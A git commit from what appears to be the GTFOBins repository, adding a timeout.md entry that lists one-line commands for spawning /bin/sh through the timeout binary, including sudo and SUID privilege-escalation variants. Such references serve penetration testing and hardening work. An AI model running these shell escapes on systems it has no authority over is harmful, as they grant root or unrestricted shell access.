Add expand, unexpand

This commit is contained in:
Dov Murik
2018-06-12 14:06:16 +00:00
committed by Emilio Pinna
parent 4b11771fec
commit 69465eb338
12 changed files with 178 additions and 0 deletions

9
_gtfobins/timeout.md Normal file
View File

@@ -0,0 +1,9 @@
---
functions:
execute-interactive:
- code: timeout 7d /bin/sh
sudo-enabled:
- code: sudo timeout --foreground 7d /bin/sh
suid-enabled:
- code: ./timeout 7d /bin/sh -p
---